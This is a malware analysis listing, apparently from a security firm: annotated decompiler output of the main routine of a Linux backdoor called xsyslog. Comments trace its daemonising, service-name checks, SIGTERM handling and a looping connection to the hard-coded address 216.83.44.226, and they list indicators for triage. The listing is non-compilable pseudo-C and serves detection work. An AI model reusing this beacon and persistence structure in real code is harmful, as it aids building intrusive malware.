//Caffeine Security Malware Analysis
//Main section of xsyslog

// Decompiler output for the entry routine of the xsyslog sample. This is
// pseudo-C, not compilable code: `_unknown_` and `intOrPtr` are decompiler
// placeholder types, `__esp`, `_t246` and `_t336` are used without any
// declaration, and the LXXXXXXXX names are unresolved call targets that the
// decompiler labelled by address.
//
// Flow visible in this listing:
//   1. get_pid() is called; a zero result leads to L080B7700 with 1 on the
//      stack.
//   2. L08048520 is called with "ssh", "sshd" and "sendmail".
//   3. L0804EB50's result is tested; only a zero result continues.
//   4. "new insert!!" is passed to L080C36C0, daemon() is called, a value is
//      registered for signal 15, and RepeatConnect is handed to L0804B720.
//   5. The routine then loops on sleep(10) forever.
//   6. The code under label L7 resolves the hard-coded address
//      216.83.44.226 inside a while(1) loop.
//
// Strings usable as static indicators when triaging this sample:
// "ssh", "sshd", "sendmail", "new insert!!" and "216.83.44.226".
main(char _a4)
{// addr = 0x0804A490
    // Decompiler-generated locals. NOTE(review): _vN look like stack slots
    // and _tN like register temporaries - naming convention of the tool,
    // confirm against the disassembly before relying on offsets.
    intOrPtr _v12;
    intOrPtr _v16;
    char _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    _unknown_ _v32;
    _unknown_ _v36;
    _unknown_ _v40;
    _unknown_ _v44;
    _unknown_ _v48;
    _unknown_ _v52;
    _unknown_ _v56;
    _unknown_ _v60;
    _unknown_ _v68;
    _unknown_ _v72;
    _unknown_ _v76;
    _unknown_ _v80;
    _unknown_ _v82;
    _unknown_ _v84;
    intOrPtr _v104;
    intOrPtr _v108;
    _unknown_ _v116;
    _unknown_ _v148;
    _unknown_ _v180;
    _unknown_ _v184;
    char _v224;
    _unknown_ _v312;
    _unknown_ _v448;
    _unknown_ _v456;
    char _v496;
    _unknown_ _v600;
    _unknown_ _v608;
    char _v648;
    _unknown_ _v864;
    _unknown_ _v1136;
    _unknown_ _v1144;
    char _v1184;
    _unknown_ _v2164;
    _unknown_ _v2168;
    _unknown_ _v2172;
    _unknown_ _v2176;
    _unknown_ _v2180;
    _unknown_ _v2184;
    _unknown_ _v2188;
    _unknown_ _v2192;
    _unknown_ _v2196;
    char _v2208;
    intOrPtr _v2212;
    char* _v2216;
    intOrPtr _v2220;
    char* _v2224;
    char* _v2228;
    intOrPtr _v2236;
    _unknown_ _v2252;
    _unknown_ _v2256;
    intOrPtr _v2260;
    _unknown_ _v2264;
    _unknown_ _t172;
    _unknown_ _t173;
    _unknown_ _t174;
    char* _t176;
    _unknown_ _t183;
    _unknown_ _t186;
    _unknown_ _t188;
    _unknown_ _t189;
    _unknown_ _t190;
    _unknown_ _t191;
    _unknown_ _t193;
    _unknown_ _t195;
    _unknown_ _t196;
    _unknown_ _t197;
    _unknown_ _t199;
    _unknown_ _t200;
    _unknown_ _t201;
    _unknown_ _t203;
    _unknown_ _t206;
    _unknown_ _t208;
    _unknown_ _t210;
    _unknown_ _t211;
    _unknown_ _t212;
    _unknown_ _t213;
    _unknown_ _t214;
    _unknown_ _t215;
    _unknown_ _t216;
    _unknown_ _t217;
    _unknown_ _t218;
    _unknown_ _t219;
    _unknown_ _t220;
    _unknown_ _t221;
    _unknown_ _t222;
    _unknown_ _t223;
    _unknown_ _t224;
    _unknown_ _t225;
    _unknown_ _t228;
    _unknown_ _t230;
    _unknown_ _t232;
    _unknown_ _t234;
    _unknown_ _t235;
    _unknown_ _t236;
    _unknown_ _t237;
    _unknown_ _t239;
    _unknown_ _t241;
    _unknown_ _t243;
    _unknown_ _t244;
    _unknown_ _t245;
    _unknown_ _t247;
    _unknown_ _t248;
    _unknown_ _t249;
    _unknown_ _t250;
    _unknown_ _t251;
    _unknown_ _t252;
    char* _t253;
    _unknown_ _t254;
    _unknown_ _t255;
    _unknown_ _t256;
    _unknown_ _t257;
    _unknown_ _t258;
    _unknown_ _t259;
    _unknown_ _t260;
    _unknown_ _t261;
    _unknown_ _t262;
    _unknown_ _t263;
    _unknown_ _t264;
    _unknown_ _t265;
    _unknown_ _t266;
    _unknown_ _t268;
    _unknown_ _t269;
    _unknown_ _t270;
    _unknown_ _t271;
    _unknown_ _t272;
    _unknown_ _t273;
    _unknown_ _t274;
    _unknown_ _t275;
    char* _t277;
    _unknown_ _t281;
    _unknown_ _t284;
    _unknown_ _t291;
    _unknown_ _t292;
    _unknown_ _t295;
    _unknown_ _t296;
    _unknown_ _t297;
    _unknown_ _t299;
    _unknown_ _t302;
    _unknown_ _t304;
    _unknown_ _t307;
    _unknown_ _t309;
    _unknown_ _t312;
    _unknown_ _t314;
    _unknown_ _t317;
    _unknown_ _t318;
    _unknown_ _t319;
    _unknown_ _t322;
    _unknown_ _t329;
    _unknown_ _t332;
    _unknown_ _t333;
    signed int _t334;
    signed int _t335;
    _unknown_ _t337;

    // Function prologue as rendered by the decompiler.
    // NOTE(review): `__esp & 240` is presumably the usual stack alignment
    // (and esp, 0xfffffff0) shown with a truncated mask - confirm.
    _t253 =  &_a4;
    __esp = __esp & 240;
    _push( *((intOrPtr*)(_t253 - 4)));
    _push(_t333);
    _t334 = __esp;
    _push(_t245);
    _push(_t253);
    __esp = __esp - 32;
    // _t246 is loaded from the word after the first argument slot.
    // NOTE(review): presumably argv - confirm against the calling convention.
    _t246 =  *((intOrPtr*)(_t253 + 4));
    _t172 = get_pid(char * )(_t246, _t318,  &M08127689);
    _t336 = _t172;
    // A zero result from get_pid() takes the early-out path: 1 is stored at
    // the top of the stack and L080B7700 is called.
    // NOTE(review): L080B7700 is presumably exit(); it is also called with 0
    // at label L6 - confirm.
    if(_t172 == 0) {
         *__esp = 1;
        L080B7700();
        goto L6;
    }
    // Three calls to the same routine with common service names. What
    // L08048520 does with the names is not visible in this listing; review
    // that routine before drawing conclusions about these strings.
    L08048520(_t336, "ssh");
    L08048520(_t336, "sshd");
    L08048520(_t336, "sendmail");
    // Only a zero return from L0804EB50 continues; negative and positive
    // results both jump to L6.
    // NOTE(review): this three-way test resembles the handling of a fork()
    // result (error / parent leave, child continues) - confirm.
    _t239 = L0804EB50(_t172, _t291, _t318);
    _t337 = _t239;
    if(_t337 < 0) {
        goto L6;
    }
    _t318 = _t318;
    if(_t337 != 0) {
        goto L6;
    }
    // "new insert!!" is a distinctive string literal in the sample.
    // NOTE(review): L080C36C0 is presumably a print/log routine - confirm.
    L080C36C0(_t246, _t291, _t318, "new insert!!");
    L080483E0( *_t246);
    // Both visible flag arguments are 0. If this is libc daemon(3), the
    // process detaches from its terminal, changes directory to "/" and
    // redirects stdin/stdout/stderr to /dev/null.
    daemon(_t318, 0, 0);
    // 15 is SIGTERM on Linux. 134513536 == 0x08048380, which lies in the
    // same address range as the code labels used in this listing.
    // NOTE(review): presumably a handler address for SIGTERM - confirm.
    _t241 = ssignal( *_t246, _t246, 15, 134513536);
    // NOTE(review): the call pair below resembles srand(time(0)); the
    // argument shown for the second call may be mis-tracked - unconfirmed.
    L080D9170(0);
    L080B7C50(_t241);
    // RepeatConnect is passed by address together with &_v20.
    // NOTE(review): the argument shape resembles
    // pthread_create(&thread, NULL, start_routine, NULL) - confirm.
    L0804B720(_t246, _t318,  &_v20, 0,  &RepeatConnect, 0);
    // This loop has no exit, so the `goto L7` after it is never reached from
    // here.
    while(1) {
        sleep(10);
    }
    goto L7;
    // NOTE(review): L7 begins with its own prologue (frame push, three
    // register pushes, 2204 bytes of locals). It looks like a separate
    // function that the decompiler merged into main, probably because it
    // did not treat L080B7700 at L6 as non-returning. Possibly the body of
    // RepeatConnect - confirm in the disassembly.
L7:
    _push(_t334);
    _t335 = __esp;
    _push(_t292);
    _push(_t319);
    _push(_t246);
    __esp = __esp - 2204;
    // NOTE(review): the 3 / 0 pair may be a timeout value - unconfirmed.
    _v108 = 3;
    _v104 = 0;
    _t173 = L0804CB50();
    L0804CB00(_t173);
    // Addresses of several stack buffers are saved for later use; their
    // consumers are outside this listing.
    _v2224 =  &_v224;
    _t176 =  &_v1184;
    _v2228 =  &_v2208;
    _t277 =  &_v496;
    _v2216 =  &_v648;
    _v2220 = _t176;
    _v2212 = _t277;
    _v2236 = _t277;
    // Connection loop. Both branches at the bottom jump to labels (L37, L14)
    // that are not part of this listing, so the rest of the loop body is
    // not shown here.
    while(1) {
        // 135692872 == 0x08168248, a fixed address written as a global.
         *135692872 = 0;
        _v2260 = 0;
        // NOTE(review): trailing arguments 2, 1 match AF_INET / SOCK_STREAM;
        // presumably a socket() call - confirm.
        L080E14D0(_t246, __esp, 2, 1);
        // Five adjacent stack slots are cleared before the lookup.
        _v28 = 0;
        _v24 = 0;
        _v20 = 0;
        _v16 = 0;
        _v12 = 0;
         *135692872 = _t176;
        // Hard-coded IPv4 literal: the remote endpoint this routine resolves.
        // This is the network indicator carried by the listing.
        gethostbyname("216.83.44.226");
        __eflags = _t176;
        _v28 = _t176;
        // The decompiler shows the lookup result in _t176; zero goes to L37,
        // non-zero to L14.
        if(_t176 == 0) {
            goto L37;
        } else {
            goto L14;
        }
    }
    // Shared leave path for the get_pid() failure and for the non-zero
    // L0804EB50 results: 0 is stored at the top of the stack and L080B7700
    // is called. The fall-through into L7 is what the decompiler emitted.
L6:
     *__esp = 0;
    L080B7700();
    _t319 = _t318;
    _t292 = _t291;
    goto L7;
}